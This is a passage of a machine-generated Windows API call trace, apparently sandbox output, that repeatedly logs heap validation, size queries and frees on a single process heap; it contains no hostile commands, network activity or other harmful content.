dwFlags=0x0, lpMem=0x525e88) returned 1 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525e88) returned 0xa [0085.567] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525e88 | out: hHeap=0x510000) returned 1 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525648) returned 1 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525648) returned 0x14 [0085.567] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525648 | out: hHeap=0x510000) returned 1 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5250d8) returned 1 [0085.567] GetProcessHeap () returned 0x510000 [0085.567] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5250d8) returned 0x24 [0085.568] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5250d8 | out: hHeap=0x510000) returned 1 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525668) returned 1 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525668) returned 0x14 [0085.568] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525668 | out: hHeap=0x510000) returned 1 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525688) returned 1 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525688) returned 0x12 [0085.568] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525688 | out: hHeap=0x510000) returned 1 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5256a8) returned 1 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5256a8) returned 0x14 [0085.568] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5256a8 | out: hHeap=0x510000) returned 1 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5256c8) returned 1 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5256c8) returned 0x16 [0085.568] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5256c8 | out: hHeap=0x510000) returned 1 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] GetProcessHeap () returned 0x510000 [0085.568] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5256e8) returned 1 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5256e8) returned 0x14 [0085.569] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5256e8 | out: hHeap=0x510000) returned 1 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525ea0) returned 1 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525ea0) returned 0xc [0085.569] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525ea0 | out: hHeap=0x510000) returned 1 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525708) returned 1 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525708) returned 0x14 [0085.569] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525708 | out: hHeap=0x510000) returned 1 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523fa0) returned 1 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523fa0) returned 0x1a [0085.569] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x523fa0 | out: hHeap=0x510000) returned 1 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525728) returned 1 [0085.569] GetProcessHeap () returned 0x510000 [0085.569] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525728) returned 0x14 [0085.570] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525728 | out: hHeap=0x510000) returned 1 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525eb8) returned 1 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525eb8) returned 0x10 [0085.570] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525eb8 | out: hHeap=0x510000) returned 1 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525748) returned 1 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525748) returned 0x14 [0085.570] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525748 | out: hHeap=0x510000) returned 1 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523fc8) returned 1 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523fc8) returned 0x1a [0085.570] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x523fc8 | out: hHeap=0x510000) returned 1 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525768) returned 1 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525768) returned 0x14 [0085.570] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525768 | out: hHeap=0x510000) returned 1 [0085.570] GetProcessHeap () returned 0x510000 [0085.570] GetProcessHeap () returned 0x510000 [0085.571] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525ed0) returned 1 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525ed0) returned 0xc [0085.571] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525ed0 | out: hHeap=0x510000) returned 1 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525788) returned 1 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525788) returned 0x14 [0085.571] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525788 | out: hHeap=0x510000) returned 1 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525ee8) returned 1 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525ee8) returned 0xe [0085.571] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525ee8 | out: hHeap=0x510000) returned 1 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5257a8) returned 1 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5257a8) returned 0x14 [0085.571] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5257a8 | out: hHeap=0x510000) returned 1 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5257c8) returned 1 [0085.571] GetProcessHeap () returned 0x510000 [0085.571] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5257c8) returned 0x16 [0085.572] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5257c8 | out: hHeap=0x510000) returned 1 [0085.572] GetProcessHeap () returned 0x510000 [0085.572] GetProcessHeap () returned 0x510000 [0085.572] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5257e8) returned 1 [0085.572] GetProcessHeap () returned 0x510000 [0085.572] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5257e8) returned 0x14 [0085.572] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5257e8 | out: hHeap=0x510000) returned 1 [0085.572] GetProcessHeap () returned 0x510000 [0085.572] GetProcessHeap () returned 0x510000 [0085.572] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523ff0) returned 1 [0085.572] GetProcessHeap () returned 0x510000 [0085.572] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523ff0) returned 0x1a [0085.572] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x523ff0 | out: hHeap=0x510000) returned 1 [0085.572] GetProcessHeap () returned 0x510000 [0085.572] GetProcessHeap () returned 0x510000 [0085.572] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525808) returned 1 [0085.572] GetProcessHeap () returned 0x510000 [0085.572] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525808) returned 0x14 [0085.572] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525808 | out: hHeap=0x510000) returned 1 [0085.572] GetProcessHeap () returned 0x510000 [0085.572] GetProcessHeap () returned 0x510000 [0085.572] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f00) returned 1 [0085.572] GetProcessHeap () returned 0x510000 [0085.573] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f00) returned 0xc [0085.573] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f00 | out: hHeap=0x510000) returned 1 [0085.573] GetProcessHeap () returned 0x510000 [0085.573] GetProcessHeap () returned 0x510000 [0085.573] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525828) returned 1 [0085.573] GetProcessHeap () returned 0x510000 [0085.573] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525828) returned 0x14 [0085.573] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525828 | out: hHeap=0x510000) returned 1 [0085.573] GetProcessHeap () returned 0x510000 [0085.573] GetProcessHeap () returned 0x510000 [0085.573] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526270) returned 1 [0085.573] GetProcessHeap () returned 0x510000 [0085.573] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526270) returned 0x28 [0085.573] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526270 | out: hHeap=0x510000) returned 1 [0085.573] GetProcessHeap () returned 0x510000 [0085.573] GetProcessHeap () returned 0x510000 [0085.573] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525848) returned 1 [0085.573] GetProcessHeap () returned 0x510000 [0085.573] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525848) returned 0x14 [0085.574] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525848 | out: hHeap=0x510000) returned 1 [0085.574] GetProcessHeap () returned 0x510000 [0085.574] GetProcessHeap () returned 0x510000 [0085.574] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5262a0) returned 1 [0085.574] GetProcessHeap () returned 0x510000 [0085.574] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5262a0) returned 0x26 [0085.574] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5262a0 | out: hHeap=0x510000) returned 1 [0085.574] GetProcessHeap () returned 0x510000 [0085.574] GetProcessHeap () returned 0x510000 [0085.574] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525868) returned 1 [0085.574] GetProcessHeap () returned 0x510000 [0085.574] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525868) returned 0x14 [0085.574] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525868 | out: hHeap=0x510000) returned 1 [0085.574] GetProcessHeap () returned 0x510000 [0085.574] GetProcessHeap () returned 0x510000 [0085.574] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5262d0) returned 1 [0085.574] GetProcessHeap () returned 0x510000 [0085.574] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5262d0) returned 0x8 [0085.574] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5262d0 | out: hHeap=0x510000) returned 1 [0085.574] GetProcessHeap () returned 0x510000 [0085.574] GetProcessHeap () returned 0x510000 [0085.574] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525888) returned 1 [0085.575] GetProcessHeap () returned 0x510000 [0085.575] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525888) returned 0x14 [0085.575] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525888 | out: hHeap=0x510000) returned 1 [0085.575] GetProcessHeap () returned 0x510000 [0085.575] GetProcessHeap () returned 0x510000 [0085.575] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5262e0) returned 1 [0085.575] GetProcessHeap () returned 0x510000 [0085.575] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5262e0) returned 0x22 [0085.575] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5262e0 | out: hHeap=0x510000) returned 1 [0085.575] GetProcessHeap () returned 0x510000 [0085.575] GetProcessHeap () returned 0x510000 [0085.575] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5258a8) returned 1 [0085.575] GetProcessHeap () returned 0x510000 [0085.575] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5258a8) returned 0x14 [0085.575] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5258a8 | out: hHeap=0x510000) returned 1 [0085.575] GetProcessHeap () returned 0x510000 [0085.575] GetProcessHeap () returned 0x510000 [0085.575] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526310) returned 1 [0085.575] GetProcessHeap () returned 0x510000 [0085.575] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526310) returned 0x8 [0085.575] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526310 | out: hHeap=0x510000) returned 1 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5258c8) returned 1 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5258c8) returned 0x14 [0085.576] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5258c8 | out: hHeap=0x510000) returned 1 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f18) returned 1 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f18) returned 0x10 [0085.576] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f18 | out: hHeap=0x510000) returned 1 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5258e8) returned 1 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5258e8) returned 0x14 [0085.576] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5258e8 | out: hHeap=0x510000) returned 1 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525908) returned 1 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525908) returned 0x18 [0085.576] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525908 | out: hHeap=0x510000) returned 1 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525928) returned 1 [0085.576] GetProcessHeap () returned 0x510000 [0085.576] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525928) returned 0x14 [0085.577] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525928 | out: hHeap=0x510000) returned 1 [0085.577] GetProcessHeap () returned 0x510000 [0085.577] GetProcessHeap () returned 0x510000 [0085.577] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f30) returned 1 [0085.577] GetProcessHeap () returned 0x510000 [0085.577] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f30) returned 0xa [0085.577] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f30 | out: hHeap=0x510000) returned 1 [0085.577] GetProcessHeap () returned 0x510000 [0085.577] GetProcessHeap () returned 0x510000 [0085.577] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525948) returned 1 [0085.577] GetProcessHeap () returned 0x510000 [0085.577] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525948) returned 0x14 [0085.577] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525948 | out: hHeap=0x510000) returned 1 [0085.577] GetProcessHeap () returned 0x510000 [0085.577] GetProcessHeap () returned 0x510000 [0085.577] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525968) returned 1 [0085.577] GetProcessHeap () returned 0x510000 [0085.577] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525968) returned 0x16 [0085.578] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525968 | out: hHeap=0x510000) returned 1 [0085.578] GetProcessHeap () returned 0x510000 [0085.578] GetProcessHeap () returned 0x510000 [0085.578] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525988) returned 1 [0085.578] GetProcessHeap () returned 0x510000 [0085.578] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525988) returned 0x14 [0085.578] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525988 | out: hHeap=0x510000) returned 1 [0085.578] GetProcessHeap () returned 0x510000 [0085.578] GetProcessHeap () returned 0x510000 [0085.578] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5259a8) returned 1 [0085.578] GetProcessHeap () returned 0x510000 [0085.578] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5259a8) returned 0x18 [0085.578] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5259a8 | out: hHeap=0x510000) returned 1 [0085.578] GetProcessHeap () returned 0x510000 [0085.578] GetProcessHeap () returned 0x510000 [0085.578] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5259c8) returned 1 [0085.578] GetProcessHeap () returned 0x510000 [0085.578] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5259c8) returned 0x14 [0085.578] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5259c8 | out: hHeap=0x510000) returned 1 [0085.578] GetProcessHeap () returned 0x510000 [0085.578] GetProcessHeap () returned 0x510000 [0085.578] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5259e8) returned 1 [0085.578] GetProcessHeap () returned 0x510000 [0085.579] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5259e8) returned 0x14 [0085.579] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5259e8 | out: hHeap=0x510000) returned 1 [0085.579] GetProcessHeap () returned 0x510000 [0085.579] GetProcessHeap () returned 0x510000 [0085.579] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525a08) returned 1 [0085.579] GetProcessHeap () returned 0x510000 [0085.579] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525a08) returned 0x14 [0085.579] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525a08 | out: hHeap=0x510000) returned 1 [0085.579] GetProcessHeap () returned 0x510000 [0085.579] GetProcessHeap () returned 0x510000 [0085.579] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f48) returned 1 [0085.579] GetProcessHeap () returned 0x510000 [0085.579] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f48) returned 0x10 [0085.579] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f48 | out: hHeap=0x510000) returned 1 [0085.579] GetProcessHeap () returned 0x510000 [0085.579] GetProcessHeap () returned 0x510000 [0085.579] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525a28) returned 1 [0085.579] GetProcessHeap () returned 0x510000 [0085.579] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525a28) returned 0x14 [0085.579] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525a28 | out: hHeap=0x510000) returned 1 [0085.579] GetProcessHeap () returned 0x510000 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f60) returned 1 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f60) returned 0xe [0085.580] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f60 | out: hHeap=0x510000) returned 1 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525a48) returned 1 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525a48) returned 0x14 [0085.580] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525a48 | out: hHeap=0x510000) returned 1 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f78) returned 1 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f78) returned 0xe [0085.580] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f78 | out: hHeap=0x510000) returned 1 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525a68) returned 1 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525a68) returned 0x14 [0085.580] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525a68 | out: hHeap=0x510000) returned 1 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525f90) returned 1 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525f90) returned 0x10 [0085.580] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525f90 | out: hHeap=0x510000) returned 1 [0085.580] GetProcessHeap () returned 0x510000 [0085.580] GetProcessHeap () returned 0x510000 [0085.581] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525a88) returned 1 [0085.581] GetProcessHeap () returned 0x510000 [0085.581] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525a88) returned 0x14 [0085.581] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525a88 | out: hHeap=0x510000) returned 1 [0085.581] GetProcessHeap () returned 0x510000 [0085.581] GetProcessHeap () returned 0x510000 [0085.581] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526320) returned 1 [0085.581] GetProcessHeap () returned 0x510000 [0085.581] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526320) returned 0x4e [0085.581] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526320 | out: hHeap=0x510000) returned 1 [0085.581] GetProcessHeap () returned 0x510000 [0085.581] GetProcessHeap () returned 0x510000 [0085.581] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525aa8) returned 1 [0085.581] GetProcessHeap () returned 0x510000 [0085.581] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525aa8) returned 0x14 [0085.581] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525aa8 | out: hHeap=0x510000) returned 1 [0085.581] GetProcessHeap () returned 0x510000 [0085.581] GetProcessHeap () returned 0x510000 [0085.581] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526378) returned 1 [0085.581] GetProcessHeap () returned 0x510000 [0085.581] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526378) returned 0x4e [0085.581] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526378 | out: hHeap=0x510000) returned 1 [0085.581] GetProcessHeap () returned 0x510000 [0085.581] GetProcessHeap () returned 0x510000 [0085.581] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525ac8) returned 1 [0085.581] GetProcessHeap () returned 0x510000 [0085.582] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525ac8) returned 0x14 [0085.582] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525ac8 | out: hHeap=0x510000) returned 1 [0085.582] GetProcessHeap () returned 0x510000 [0085.582] GetProcessHeap () returned 0x510000 [0085.582] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5263d0) returned 1 [0085.582] GetProcessHeap () returned 0x510000 [0085.582] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5263d0) returned 0x4e [0085.582] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5263d0 | out: hHeap=0x510000) returned 1 [0085.582] GetProcessHeap () returned 0x510000 [0085.582] GetProcessHeap () returned 0x510000 [0085.582] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525ae8) returned 1 [0085.582] GetProcessHeap () returned 0x510000 [0085.582] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525ae8) returned 0x14 [0085.582] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x525ae8 | out: hHeap=0x510000) returned 1 [0085.582] GetProcessHeap () returned 0x510000 [0085.582] GetProcessHeap () returned 0x510000 [0085.582] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526428) returned 1 [0085.582] GetProcessHeap () returned 0x510000 [0085.582] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526428) returned 0x4e [0085.582] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526428 | out: hHeap=0x510000) returned 1 [0085.582] GetProcessHeap () returned 0x510000 [0085.582] GetProcessHeap () returned 0x510000 [0085.582] HeapValidate (hHeap=0x510000, 